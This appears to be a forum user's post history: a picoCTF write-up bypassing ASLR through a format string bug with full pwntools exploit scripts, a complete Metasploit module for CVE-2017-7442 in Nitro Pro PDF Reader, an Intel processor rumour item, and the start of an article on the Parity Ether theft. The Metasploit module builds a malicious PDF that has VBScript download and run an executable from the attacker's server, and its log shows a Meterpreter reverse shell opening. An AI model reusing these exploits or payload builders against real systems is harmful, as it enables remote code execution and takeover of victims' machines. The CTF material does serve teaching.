Everything posted by Nytro

  1. picoCTF Write-up ~ Bypassing ASLR via Format String Bug
     _py, Apr 23

Hello folks! I hope you're all doing great. After a disgusting amount of trial and error, I present to you my solution for the console pwnable. Unfortunately, I did not solve the task in time, but it was fun nevertheless. I decided to use this challenge as a way to introduce one of the ways you can bypass ASLR. If you have never messed with basic pwning, i.e. stack/buffer overflows, this write-up might not be your cup of tea. It'll be quite technical. First I'll bombard you with theory and then we will move on to the actual PoC/exploit, aka the all-time classic @_py way of explaining stuff. Let's dive right in, shall we?

Code Auditing

Though the source code was provided (you can find a link to it at the bottom of the write-up), you could easily spot the bug just by reading the disassembly. Since some of you might not be experienced with reverse engineering, below are the important parts of the code:

[...]
void set_exit_message(char *message) {
  if (!message) {
    printf("No message chosen\n");
    exit(1);
  }
  printf("Exit message set!\n");
  printf(message);
  append_command('e', message);
  exit(0);
}

void set_prompt(char *prompt) {
  if (!prompt) {
    printf("No prompt chosen\n");
    exit(1);
  }
  if (strlen(prompt) > 10) {
    printf("Prompt too long\n");
    exit(1);
  }
  printf("Login prompt set to: %10s\n", prompt);
  append_command('p', prompt);
  exit(0);
}
[...]

void loop() {
  char buf[1024];
  while (true) {
    printf("Config action: ");
    char *result = fgets(buf, 1024, stdin);
    if (!result) exit(1);
    char *type = strtok(result, " ");
    if (type == NULL) {
      continue;
    }
    char *arg = strtok(NULL, "\n");
    switch (type[0]) {
      case 'l': set_login_message(arg); break;
      case 'e': set_exit_message(arg); break;
      case 'p': set_prompt(arg); break;
      default: printf("Command unrecognized.\n"); /* Fallthrough */
      case 'h': print_help(); break;
    }
  }
}
[...]

Here is the bug:

void set_exit_message(char *message) {
  [...]
  printf("Exit message set!\n");
  printf(message);
  append_command('e', message);
  exit(0);
}

Cute, we've got control over printf! For those who do not understand why this is a bug, let me give you a brief rundown. To be honest, there are a bunch of resources on how format string attacks work, but since I'm making the effort to explain the exploit, it'd feel incomplete not to explain the theory behind it. I hope you know at least the basics of the stack, otherwise the following will not make much sense.

Printf & Stack Analysis

+------------+
|            |
|    ...     |
|  8th arg   |
+------------+
|  7th arg   |
+------------+
|  ret addr  |
+------------+
|    ...     |
| local vars |
|    ...     |
+------------+

Now you might be asking yourselves, "what's up with the 7th and 8th argument in the ascii art?". Well, we are dealing with a 64-bit ELF binary. Meaning, as far as the function calling convention is concerned, the ABI states the following (simplified): the first 6 integer or pointer arguments to a function are passed in registers. The first is placed in rdi, the second in rsi, the third in rdx, and then rcx, r8 and r9. Only the 7th argument and onwards are passed on the stack. Interesting. Let's enter h4x0r mode and brainstorm a little bit. By typing man 3 printf we get the following intel:

#include <stdio.h>

int printf(const char *format, ...);

So printf receives "2" arguments: the format string, e.g. "%d %x %s", and a variable number of arguments. Ok, that sounds cool and all, but how can we exploit this?
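Before moving on, a quick aside: you can watch printf behave exactly like this from Python via ctypes. A minimal sketch of my own (not part of the original write-up; assumes Linux/glibc):

import ctypes

libc = ctypes.CDLL("libc.so.6")
# Six specifiers, zero matching arguments: printf happily prints whatever
# happens to sit in the argument registers and on the stack.
libc.printf("%p %p %p %p %p %p\n")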
The key in exploit development, and in hacking overall, is being able to see through the abstraction. Let me explain myself further. Let's assume we have the following code:

[...]
int32_t num = 6;
printf("%d", num);
[...]

Here's the pseudo-assembly for it:

mov [rbp - offset], 0x6
mov rsi, [rbp - offset]
mov rdi, "%d"
call printf

Our format string includes "%d". What this whispers into printf's ear is "yo printf, you are about to get called with one format specifier, %d to be precise. According to the ABI, expect the argument to be in rsi (rdi holds the format string itself), ok?" Then, printf will read the content of rsi and print the number 6 to stdout. Do you see where this is going? No? Alright, one more example.

[...]
int32_t num = 6;
printf("%d %d %d %d");
[...]

mov [rbp - offset], 0x6
???
call printf

In case you didn't notice, I changed the format string and the number of arguments being passed to printf. "What will this whisper into printf's ear?" you ask. Well, "yo printf, you are about to get called with 4 format specifiers, 4 %d's to be precise. According to the ABI, expect the arguments to be in rsi, rdx and so on, ok?" Now what's going to happen in this case? Has anything practically changed? Of course not! Printf is dumb; all it knows is the format string. It "trusts" us, the user/program, about the contents of the argument registers. As I've stated before, we have control over printf. Control over its format string argument, to be exact. That's really powerful! Why?

[asciinema demo]

The above clip is a demo of the vulnerable CTF task. If you read the source code real quick (shouldn't take more than 5 mins to understand what it does), you'd realize that set_exit_message essentially receives as an argument whatever we place next to 'e' (e stands for exit). Afterwards, it calls printf with that argument. So what gives? The format string we provided instructed printf to print its 8-byte integer "arguments" as pointers (%p expects a pointer). The values printed are values that printf finds at the locations where it would normally expect arguments. Because printf actually gets one real argument, namely the pointer to buf (passed in %rdi), it will expect the next 5 arguments in the remaining registers and everything else on the stack. That's the case with our binary as well! We managed to leak memory! And the best part? We actually read values "above" set_exit_message's stack frame!

Take a good look at the printf output. Does 0x400aa6 ring a bell? Looks like a text segment address. That's the return address in set_exit_message's stack frame, aka one of loop's instruction addresses! Moreover, did you notice the 0x7025207025207025 value? Since the architecture is little-endian, converting the hex values to characters, we get the following:

0x25 -> '%'
0x70 -> 'p'
0x20 -> ' '

Holy moly! We leaked main's stack frame! But more importantly, our own input! That's the so-called read primitive, which basically means we get to read whatever value we want, whether in registers, on the stack, or even in our own input. You'll see how crucial that is in the exploitation segment. Do you understand now what I mean by seeing through the abstraction? We managed to exploit a simple assumption that computer scientists took for granted. Phew, alrighty, I hope I made sense, folks. Let's slowly move on to the exploitation part. First of all, this is a pwnable task, which means we need to get a shell (root privs) in order to be able to read the flag text file. Hmm, how can we tackle the task knowing that we have a read primitive?
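As a side note, here's that little-endian decoding done in code, a tiny sketch using the qword leaked in the demo:

import struct

leaked = 0x7025207025207025
print struct.pack("<Q", leaked)   # '%p %p %p' -- our own format string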
Let's construct a plan:

- We managed to read values off of registers and the stack, aka a read primitive.
- We can take advantage of that and read certain values that will be useful to us, such as libc's base address.
- If we manage to leak libc's address, we can calculate addresses of other "pwnable" functions such as execve or system, and get a shell.

Note, I say "leak", because ASLR is activated. Thus, in every execution libc will have a different base address. Otherwise, if ASLR were off, its address would be hardcoded and our life would be much easier. Libc's functions are a constant offset away from libc's base address, so we won't have an issue resolving them once we get the base address. Alright, we can leak libc's functions, and then what? Let's pause our plan for a while. (Note: though dynamic linking is not a prerequisite to understand the high-level view of the exploit, knowing its internals will give you a much better insight into the nitty-gritty details of the exploitation process. I have made quite a detailed write-up on dynamic linking internals, which can be found here.)

The Dark Side Of Printf

We saw that we have an arbitrary read through the format string bug. But that's not enough. Wouldn't it be awesome if we could somehow not only read values but also write them? Enter the dark zone, folks:

%n specifier

If you are not into pwning or programming in C, you have probably never seen the "%n" specifier. %n is the gold mine of format string attacks. Using this stackoverflow link as a reference, I'll explain what %n is capable of.

#include <stdio.h>

int main() {
  int val;
  printf("blah %n blah\n", &val);
  printf("val = %d\n", val);
  return 0;
}

Output:

blah  blah
val = 5

Simply put, it stores the number of characters printed so far into a variable (given its address). Sweet, now we have a write primitive as well! How can we take advantage of that? Since we have an arbitrary write, we can write anything we want wherever we want (you'll see how shortly). Let's resume our plan:

- We can overwrite any address with a value that makes our life easier.
- We could overwrite a function's address with system's and game over!

Nope, not that easily, at least. Looking at the source, we can see that after printf is called, exit() is called. This is a bummer, since our plan does not only require an arbitrary write, but an arbitrary read as well. We can't just leak libc's base address AND overwrite a function through the same format string. We need to do it in separate steps. But how? exit() will terminate the program. Unless we overwrite exit's address with something else! Hmm, that's indeed a pretty neat idea. But with what? What about loop's address?! That sounds like an awesome plan! We can overwrite exit's address with loop's, so the binary never exits! That way, we can endlessly enter our bogus input and read/write values with no rush.

%[width] modifier

Another piece of dark printf wizardry is the following code:

[...]
printf("Output:");
printf("%100x", 6);
[...]

Terminal:

> ./demo
Output:                                            6

6 is padded to a field 100 characters wide. In other words, with the [width] part we can instruct printf to print as many characters as we want. Why is that useful though? Imagine having to write the value 0x1337 to a variable using the %n specifier (keep in mind that function addresses vary from 0x400000 all the way to addresses like 0x7fe5b94126a3; that trick will be really helpful to us). Typing 0x1337 characters by hand is tedious and a waste of time. The width modifier gets the job done more easily.
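Here's the 0x1337 example as a minimal sketch (the assumption that nothing has been printed before the pad is mine):

# %n stores the number of characters printed so far, so to make it write
# 0x1337 we have printf pad the output to 0x1337 (= 4919) characters first.
target = 0x1337
already_printed = 0                 # assumption: nothing printed before the pad
width = target - already_printed
payload = "%{}x%n".format(width)    # "%4919x%n"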
%[number]$ specifier

The last trick we'll be using is the %[number]$ specifier, which lets us refer to specific "argument" offsets directly. Demo time:

[asciinema demo]

Scroll up to the demo where I showed you the bug in action through the %p specifier. If you count the values that are printed, you will notice that 0x400aa6 is the 9th value. By entering %9$p as I showed above, we can refer to it directly. Imagine replacing 'p' with 'n'. What would have happened? In a different case, it would crash, because 0x400aa6 would be overwritten with the number of characters printed (which would not be a valid instruction address). In our case, nothing should happen, since exit() is called, which means we never return back to loop().

Pwning Time

I know this might look like a lot to take in, but without the basics and theory, we are handicapped. Bear in mind, it took me around 3-5 days of straight research to get this to work. If you feel like it's complicated, it's not. You just need to re-read it a couple of times and play with the binary yourself to get a feel for it. Be patient, code is coming soon. It will all make sense (hopefully).

Our plan starts making sense. The first step is to overwrite exit's address with loop's. Luckily for us, the binary does not have full ASLR on. Meaning, the text segment, which includes the machine code, and the Global Offset Table (refer to my dynamic linking write-up, I warned you), which includes function pointers into libc (and more), have hardcoded addresses. Now that we've learnt all about the dark side of printf, it's time to apply this knowledge to the task.

Overwriting exit

In order to do that, we first need to place exit's GOT entry in the format string. The reason is that, since we have an arbitrary read/write, we can:

- Place exit's address in the format string (which will be stored on the stack).
- Use the %[number]$ specifier to refer to its offset.
- Use the %[width] modifier to pad whatever is already printed to a certain number.
- Use the %n specifier to write that number to exit's address.

Let's begin exploring with the terminal and soon we will move to Python using pwntools. By the way, not sure if you noticed, but I decided to include more "live" footage this time rather than just screenshots. The concept can be confusing, so I'll do my best to be as thorough as possible. Let the pwning begin:

[asciinema demo]

At this point I'd like to thank @exploit, who reminded me of the stack alignment when I was stuck trying to figure out why the A's were getting mixed up. Watch each demo carefully. If I feel there is a need to explain myself further, I'll add comments below the asciinema instance. You are more than welcome to ask me questions in the comments. Anyway, as shown in the demo, we begin our testing by entering A's in our format string and then %p's in order to print them out. We found out that they are the 15th value. Let's try the %15$p trick this time.

[asciinema demo]

Looking good so far. Let's automate it in Python so we won't have to type it every time.

# demo.py
from pwn import *

p = process(['./console', 'log'])
pause()

payload = "exit".ljust(8)
payload += "A"*8
payload += "|%15$p|".rjust(8)

p.sendline(payload)
p.recvline()
p.interactive()

Awesome, now we've got control over our input and we know its exact position. Let's try with exit's GOT entry this time, 0x601258.
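If counting the %p values by eye ever gets tedious, the offset can also be brute-forced. A hedged sketch along the lines of the script above (the loop bound is arbitrary):

# offset_finder.py
from pwn import *

for i in range(1, 30):
    p = process(['./console', 'log'])
    payload = "exit".ljust(8) + "A"*8 + "|%{}$p|".format(i)
    p.sendline(payload)
    data = p.recvrepeat(0.2)
    p.close()
    if "0x4141414141414141" in data:     # 'A'*8 read back as a qword
        log.success("our input sits at offset %d" % i)
        break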
Remember, we are dealing with 8-byte chunks, so we need to pad the address to 8 bytes:

# demo.py
from pwn import *

p = process(['./console', 'log'])
pause()

payload = "exit".ljust(8)
payload += p64(0x601258)  # \x58\x12\x60\x00\x00\x00\x00\x00
payload += "|%15$p|".rjust(8)

p.sendline(payload)
p.recvline()
p.interactive()

Let's see what it does in action.

[asciinema demo]

Hm, something is wrong here. Not only did we not get the address, we didn't even get the "|...|" part. Why? Well, in case you didn't know, printf stops at a null byte. Which makes sense! exit's GOT entry does contain null bytes. Meaning, printf will read up to '\x60' and then stop. How can we fix that? Easy, we just move our address after the format specifier.

#demo.py
from pwn import *

EXIT_GOT = 0x601258

p = process(['./console', 'log'])
pause()

payload = "exit".ljust(8)
payload += "|%16$p|".rjust(8)
payload += p64(EXIT_GOT)

p.sendline(payload)
p.interactive()

Now our script should work. I've changed exit's position in the string and updated '%15$p' to '%16$p'. I'll let you think about why I changed the specifier offset. After all this explanation it should be clear. Let's run our script, shall we?

[asciinema demo]

Look at that, our address is there! Problem fixed. Unfortunately, that's the bummer with 64-bit addresses; with 32-bit ones we wouldn't have that issue. Either way, the fix was simple. Let's recap:

- We've managed to get control over our input.
- We placed exit's address in the string. In doing so, we managed to find its offset.
- Knowing its offset, we can use %offset$n to write to that address.

Thinking back to our plan, our goal is to overwrite exit's address with loop()'s. I know beforehand that exit's GOT entry points to 0x400736. That's because exit has not been called yet, and thus it points to its PLT stub, which contains executable code to resolve exit's address in libc. So what we want is this:

0x400736 => 0x4009bd

We don't have to overwrite the whole address, as you can see. Only its 2 lower bytes. Now I will demonstrate how %n can be used. You will notice the demo is kinda slow. That's because asciinema does not record 2 terminals at a time and I'll be using two: one to run the binary and one to attach to it with gdb. Updated script:

#demo.py
from pwn import *

EXIT_GOT = 0x601258

p = process(['./console', 'log'])
pause()

payload = "exit".ljust(8)
payload += "|%17$n|".rjust(16)
payload += p64(EXIT_GOT)

p.sendline(payload)
p.interactive()

First I will show what happens without the help of GDB and then I'll fire it up.

[asciinema demo]

We get a segfault, which makes sense, right? We overwrote exit's address with the number of characters printed, which is far too small and thus not a legal address to jump to. Let's see what GDB has to say about this.

[asciinema demo]

As shown above, I attached to the running binary with GDB and pressed enter in my 2nd terminal to send the input. It's pretty clear that exit's address got overwritten:

0x400736 => 0x0000000d

This is definitely not the result we want, but we are getting there! We can use our printf magic tricks to make it work:

- %[width], to increase the number of characters being printed.
- The %hn specifier. I didn't mention it earlier, but it's time to introduce you to yet another dark side of printf. With %hn we can overwrite the address partially: %hn writes a short, i.e. only 2 bytes, instead of the 4 that %n writes — exit's address in our case. I said earlier that we don't need to overwrite the whole address, only its lower 2 bytes, since the higher bytes are already the same.
I know, I know, confusing, but hey, that's why a demo is on its way! Updated script:

#demo.py
from pwn import *

EXIT_GOT = 0x601258

p = process(['./console', 'log'])
pause()

payload = "exit".ljust(8)
payload += "|%17$hn|".rjust(16)
payload += p64(EXIT_GOT)

p.sendline(payload)
p.interactive()

[asciinema demo]

Bam! We went from 0x0000000d to 0x0040000c. Partial overwrite, folks! Now let's think carefully. We want 0x09bd to be the 2 lower bytes. All we have to do is:

- Convert 0x09bd to decimal (2493).
- Use that number in the form %2493x.

You will notice that the 2 lower bytes will be slightly off, but we can adjust that, as you'll see soon. Let's update our script:

#demo.py
from pwn import *

EXIT_GOT = 0x601258
LOOP = 0x4009bd

p = process(['./console', 'log'])
pause()

payload = "exit".ljust(8)
payload += ("%%%du|%%17$hn|" % 2493).rjust(16)
payload += p64(EXIT_GOT)

p.sendline(payload)
p.interactive()

[asciinema demo]

Looks like it worked! Well, almost. We just need to subtract 6 and we should be golden! Updated script:

#demo.py
from pwn import *

EXIT_GOT = 0x601258
LOOP = 0x4009bd

p = process(['./console', 'log'])
pause()

payload = "exit".ljust(8)
payload += ("%%%du|%%17$hn|" % 2487).rjust(16)
payload += p64(EXIT_GOT)

p.sendline(payload)
p.interactive()

[asciinema demo]

Boom! We successfully overwrote exit's address with loop's. So every time exit gets called, we will jump right back to the beginning and be able to enter a different format string, this time to leak libc's base address and more.

Leaking Libc

Time to move on with our plan. Leaking libc is not that hard. With a little bit of code we can resolve its base address in no time.

def leak(addr):
    info("Leaking libc base address")
    payload = "exit".ljust(8)
    payload += "|%17$s|".rjust(8)
    payload += "blablala"
    payload += p64(addr)
    p.sendline(payload)
    p.recvline()
    data = p.recvuntil("blablala")
    fgets = data.split('|')[1]
    fgets = hex(u64(fgets.ljust(8, "\x00")))
    return fgets

I will not explain every technical aspect of the snippet, since this is not a Python tutorial. This is what I tried to achieve overall:

- The goal is to leak libc's base address. We can accomplish that by leaking a libc function's address. fgets() would be a wise choice in our case, since it's already been resolved. In particular, I entered fgets's GOT entry, which contains its actual libc address.
- The %s specifier treats the address we entered as a pointer to a string of bytes. Meaning, it will try to read what's IN the GOT entry. The output will be a stream of raw bytes.
- I used the u64() function to convert the raw bytes to an actual address.
- Once we find its address, we subtract fgets's libc offset from it and we get the base address.
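To make that last step concrete, here's the arithmetic in isolation, a minimal sketch where the leaked value is a made-up example and the offsets are the ones used in the final exploit below:

FGETS_OFFSET  = 0x6dad0            # fgets's offset inside the provided libc
SYSTEM_OFFSET = 0x45390            # system's offset inside the same libc

leaked_fgets = 0x7f1234a6dad0      # hypothetical value returned by leak()
libc_base    = leaked_fgets - FGETS_OFFSET
system_addr  = libc_base + SYSTEM_OFFSET
print hex(libc_base), hex(system_addr)   # 0x7f1234a00000 0x7f1234a45390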
I made the exploit a little cleaner:

#demo.py
from pwn import *
import sys

HOST = 'shell2017.picoctf.com'
PORT = '47232'

LOOP = 0x4009bd
STRLEN_GOT = 0x601210
EXIT_GOT = 0x601258
FGETS_GOT = 0x601230
FGETS_OFFSET = 0x6dad0
SYSTEM_OFFSET = 0x45390
STRLEN_OFFSET = 0x8ab70

def info(msg):
    log.info(msg)

def leak(addr):
    info("Leaking libc base address")
    payload = "exit".ljust(8)
    payload += "|%17$s|".rjust(8)
    payload += "blablala"
    payload += p64(addr)
    p.sendline(payload)
    p.recvline()
    data = p.recvuntil("blablala")
    fgets = data.split('|')[1]
    fgets = hex(u64(fgets.ljust(8, "\x00")))
    return fgets

def overwrite(addr, pad):
    payload = "exit".ljust(8)
    payload += ("%%%du|%%17$hn|" % pad).rjust(16)
    payload += p64(addr)
    p.sendline(payload)
    p.recvline()
    return

def exploit(p):
    info("Overwriting exit with loop")
    pad = (LOOP & 0xffff) - 6
    overwrite(EXIT_GOT, pad)
    FGETS_LIBC = leak(FGETS_GOT)
    LIBC_BASE = hex(int(FGETS_LIBC, 16) - FGETS_OFFSET)
    SYSTEM_LIBC = hex(int(LIBC_BASE, 16) + SYSTEM_OFFSET)
    STRLEN_LIBC = hex(int(LIBC_BASE, 16) + STRLEN_OFFSET)
    info("system: %s" % SYSTEM_LIBC)
    info("strlen: %s" % STRLEN_LIBC)
    info("libc: %s" % LIBC_BASE)
    p.interactive()

if __name__ == "__main__":
    log.info("For remote: %s HOST PORT" % sys.argv[0])
    if len(sys.argv) > 1:
        p = remote(sys.argv[1], int(sys.argv[2]))
        exploit(p)
    else:
        p = process(['./console', 'log'])
        pause()
        exploit(p)

Just some notes on how to find the libc the binary uses and how to find the function offsets:

> ldd console
[...]
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6
[...]

> readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep fgets
[...]
753: 000000000006dad0 417 FUNC WEAK DEFAULT 13 fgets@@GLIBC_2.2.5
[...]

Let's watch the magic happen:

[asciinema demo]

As you can see, libc's base changes in every execution, aka ASLR. But that does not affect us anymore, since we overwrote exit with loop().

Jumping to system

2/3 of our plan is done. All that is left is redirecting code execution to system with the argument being /bin/sh or sh, of course. In case you didn't notice, I purposely picked strlen as the victim. Why is that? Both system and strlen are invoked with one argument. Thus, once we overwrite strlen's GOT entry with system's address, system will receive what was supposed to be strlen's argument and execute that command. Looks like we have to go back to step #1 of our exploit. Meaning, we have to overwrite strlen's libc address with system's. Luckily for us, they share the same upper bytes, so practically we only have to overwrite the lower 4 bytes. For example, using one of our script's outputs:

0x7fb4|21ec|0b70 (strlen) => 0x7fb4|21e7|b390 (system)

This is how we can accomplish that:

# subtract 7 at the end to get the correct offset
WRITELO = int(hex(int(SYSTEM_LIBC, 16) & 0xffff), 16) - 7
WRITEHI = int(hex((int(SYSTEM_LIBC, 16) & 0xffff0000) >> 16), 16) - 7

# call prompt in order to resolve strlen's libc address.
p.sendline("prompt asdf")
p.recvline()

info("Overwriting strlen with system")
overwrite(STRLEN_GOT, WRITELO)
overwrite(STRLEN_GOT+2, WRITEHI)

The only part that deserves a bit of explanation is this one:

overwrite(STRLEN_GOT, WRITELO)
overwrite(STRLEN_GOT+2, WRITEHI)

We overwrite the libc address via two short writes. It would be possible to do it with one, but that would print a pretty big amount of padding bytes to the screen, so two writes is a bit cleaner. The concept is still the same.
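Here's the 16-bit split in isolation, using the example addresses above, plus the final trigger. The "prompt sh" line is my reading of how the shell gets popped, based on the strlen/system swap just described (p being the process object from the script):

SYSTEM = 0x7fb421e7b390
lo = SYSTEM & 0xffff             # 0xb390 -> written at STRLEN_GOT
hi = (SYSTEM >> 16) & 0xffff     # 0x21e7 -> written at STRLEN_GOT + 2

# once strlen's GOT entry holds system's address, set_prompt()'s
# strlen(prompt) call becomes system(prompt):
p.sendline("prompt sh")          # system("sh") -> shell
p.interactive()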
Let's visualize it as well:

strlen GOT = 0x601210

Global Offset Table
+--------------------+
|        ...         |
+--------------------+
|        ...         |
+--------------------+
|        0x21        | 0x601213 \
+--------------------+           > strlen + 0x2
|        0xec        | 0x601212 /
+--------------------+
|        0x0b        | 0x601211 \
+--------------------+           > strlen + 0x0
|        0x70        | 0x601210 /
+--------------------+

Now it should be clearer why and how we overwrite 2 bytes with each write. I'll show you each write separately with GDB and then the full exploit. Because I'll try to provide a view of both the exploit and GDB, the demos might be a bit slow, as I'll be jumping between terminals. Stay with me.

overwrite(STRLEN_GOT, WRITELO)

Exploit (skip a few seconds):

[asciinema demo]

GDB:

[asciinema demo]

You might have noticed that at some point in the exploit I typed "prompt asdf". The reason I did that was to resolve strlen's address, since it's the first time it is called. I set a breakpoint in GDB at that point and stepped through the process. The first time, it went through the PLT stub code in order to resolve itself, and once I typed c, its address was resolved and we overwrote its 2 lower bytes.

Before:
system: 0x7fea06160390
strlen: 0x7fea061a5b70

After:
strlen: 0x7fea06160397

The 2 lower bytes are 7 off, which is why you saw the -7 subtraction in the exploit. Sometimes it ended up being 5 or 6 off, but it doesn't matter; just adjust the value to your needs. On your system it should be more or less the same offset. Let's execute the exploit with both writes this time.

Exploit (skip a few seconds):

[asciinema demo]

GDB:

[asciinema demo]

Before:
system: 0x7fe7a273a390
strlen: 0x7fe7a277fb70

After:
strlen: 0x7fe7a273a390

Voila! We successfully overwrote strlen with system! Let's fire up the exploit without GDB and get shivers.

PoC Demo

[asciinema demo]

Conclusion

That's been it, folks. I hope I didn't waste your time. If you feel puzzled, don't get discouraged; just re-read it a couple of times and research the same topic on Google. After reading plenty of examples and implementing one of your own, you'll be 1337. By the way, the task was a remote one, but the server was kinda slow when the CTF ended, so I implemented it locally. The only change you'd have to make is to adjust the libc offsets, which is quite trivial since the libc was provided. Thank you for taking the time to read my write-up. Feedback is always welcome and much appreciated. If you have any questions, I'd love to help you out if I can. Finally, if you spot any errors in terms of code/syntax/grammar, please let me know. I'll be looking out for mistakes as well. You can find my exploit and the binary (source code, libc included) here.

Peace out, @_py

Sursa: https://0x00sec.org/t/picoctf-write-up-bypassing-aslr-via-format-string-bug/1920
  2. ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::FileDropper
  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution',
      'Description'    => %q{
        This module exploits an unsafe Javascript API implemented in Nitro and
        Nitro Pro PDF Reader version 11. The saveAs() Javascript API function
        allows for writing arbitrary files to the file system. Additionally,
        the launchURL() function allows an attacker to execute local files on
        the file system and bypass the security dialog.

        Note: This is 100% reliable.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'mr_me <steven[at]srcincite.io>', # vulnerability discovery and exploit
          'sinn3r'                          # help with msf foo!
        ],
      'References'     =>
        [
          [ 'CVE', '2017-7442' ],
          [ 'URL', 'https://www.gonitro.com/' ],
        ],
      'DefaultOptions' =>
        {
          'DisablePayloadHandler' => false
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # truly universal
          [ 'Automatic', { } ],
        ],
      'DisclosureDate' => 'XXXX',
      'DefaultTarget'  => 0))

    register_options([
      OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
      OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
    ], self.class)
  end

  def build_vbs(url, stager_name)
    name_xmlhttp = rand_text_alpha(2)
    name_adodb = rand_text_alpha(2)
    vbs = %Q|<script language="VBScript">
Set #{name_xmlhttp} = CreateObject("Microsoft.XMLHTTP")
#{name_xmlhttp}.open "GET","http://#{url}",False
#{name_xmlhttp}.send
Set #{name_adodb} = CreateObject("ADODB.Stream")
#{name_adodb}.Open
#{name_adodb}.Type=1
#{name_adodb}.Write #{name_xmlhttp}.responseBody
#{name_adodb}.SaveToFile "C:#{@temp_folder}/#{@payload_name}.exe",2
set shellobj = CreateObject("wscript.shell")
shellobj.Run "C:#{@temp_folder}/#{@payload_name}.exe",0
</script>|
    vbs.gsub!(/ /,'')
    return vbs
  end

  def on_request_uri(cli, request)
    if request.uri =~ /\.exe/
      print_status("Sending second stage payload")
      return if ((p=regenerate_payload(cli)) == nil)
      data = generate_payload_exe( {:code=>p.encoded} )
      send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )
      return
    end
  end

  def exploit
    # In order to save binary data to the file system, the payload is written
    # to a .vbs file and executed from there.
    @payload_name = rand_text_alpha(4)
    @temp_folder = "/Windows/Temp"
    register_file_for_cleanup("C:#{@temp_folder}/#{@payload_name}.hta")

    if datastore['SRVHOST'] == '0.0.0.0'
      lhost = Rex::Socket.source_address('50.50.50.50')
    else
      lhost = datastore['SRVHOST']
    end

    payload_src = lhost
    payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"
    stager_name = rand_text_alpha(6) + ".vbs"

    pdf = %Q|%PDF-1.7
4 0 obj
<< /Length 0 >>
stream
|
    pdf << build_vbs(payload_src, stager_name)
    pdf << %Q|
endstream
endobj
5 0 obj
<< /Type /Page /Parent 2 0 R /Contents 4 0 R >>
endobj
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction [ 5 0 R /Fit ] /Names <<
/JavaScript << /Names [ (EmbeddedJS) << /S /JavaScript /JS (
this.saveAs('../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
app.launchURL('c$:/../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
) >> ] >> >> >>
endobj
2 0 obj
<</Type/Pages/Count 1/Kids [ 5 0 R ]>>
endobj
3 0 obj
<<>>
endobj
xref
0 6
0000000000 65535 f
0000000166 00000 n
0000000244 00000 n
0000000305 00000 n
0000000009 00000 n
0000000058 00000 n
trailer
<< /Size 6 /Root 1 0 R >>
startxref
327
%%EOF|
    pdf.gsub!(/ /,'')
    file_create(pdf)
    super
  end
end

=begin
saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/nitro.rc
[*] Processing scripts/nitro.rc for ERB directives.
resource (scripts/nitro.rc)> use exploit/windows/fileformat/nitro_reader_jsapi
resource (scripts/nitro.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (scripts/nitro.rc)> set LHOST 172.16.175.1
LHOST => 172.16.175.1
resource (scripts/nitro.rc)> exploit
[*] Exploit running as background job.
[*] Started reverse TCP handler on 172.16.175.1:4444
msf exploit(nitro_reader_jsapi) >
[+] msf.pdf stored at /Users/mr_me/.msf4/local/msf.pdf
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.100.4:8080/
[*] Server started.
[*] 192.168.100.4 nitro_reader_jsapi - Sending second stage payload
[*] Sending stage (957487 bytes) to 172.16.175.232
[*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.232:49180) at 2017-04-05 14:01:33 -0500
[+] Deleted C:/Windows/Temp/UOIr.hta
msf exploit(nitro_reader_jsapi) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 2412 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\researcher\Desktop>
=end

Sursa: https://gist.github.com/stevenseeley/725c6c0be2ff76494c23db730fd30b6d
  3. A six-core Intel Coffee Lake processor has been spotted
     by unacomn on 24/07/2017

The rumors about Intel's Coffee Lake series processors continue, this time with images as well. Or rather, with one image. A photo of a Coffee Lake processor, taken in CPU-Z, has surfaced on the internet. The authenticity of this image cannot be verified at the moment, so I can't offer you any guarantee that it is genuine. It does, however, match the rumors so far.

This image would be of an i7 processor from the Coffee Lake series, considering that it has Hyper-Threading. The processor's name is not given, as it is a test sample. At stock, this variant runs at 3.5 GHz, with a current frequency of 3.9 GHz, alongside a TDP of 80 W. Even if the image is authentic, these specifications are certainly not final, but at least they give us a general idea of the processor's shape and how close it is to launch.

For a leak like this to take place, processors are generally only a few months away from launch. The fact that laptops using the Coffee Lake architecture have already started being listed is yet another sign that Intel could be preparing a launch for this autumn. The Coffee Lake series stands out by raising the number of cores available on the mainstream consumer platform to six. It would be the first time Intel has made such a change in the last decade. [Videocardz]

Sursa: https://zonait.tv/un-procesor-intel-coffee-lake-cu-6-nuclee-a-fost-zarit/

It's also known as "@aelius's processor".
  4. Yeah, nice. Over here, not even "union select" is in fashion anymore.
  5. Haseeb Qureshi
     Software engineer. @Airbnb alum. Instructor @Outco. Writer. Effective Altruist. Blockchain believer. Former poker pro.
     Jul 20

A hacker stole $31M of Ether — how it happened, and what it means for Ethereum

Yesterday, a hacker pulled off the second biggest heist in the history of digital currencies. Around 12:00 PST, an unknown attacker exploited a critical flaw in the Parity multi-signature wallet on the Ethereum network, draining three massive wallets of over $31,000,000 worth of Ether in a matter of minutes. Given a couple more hours, the hacker could’ve made off with over $105,000,000 from vulnerable wallets. But someone stopped them.

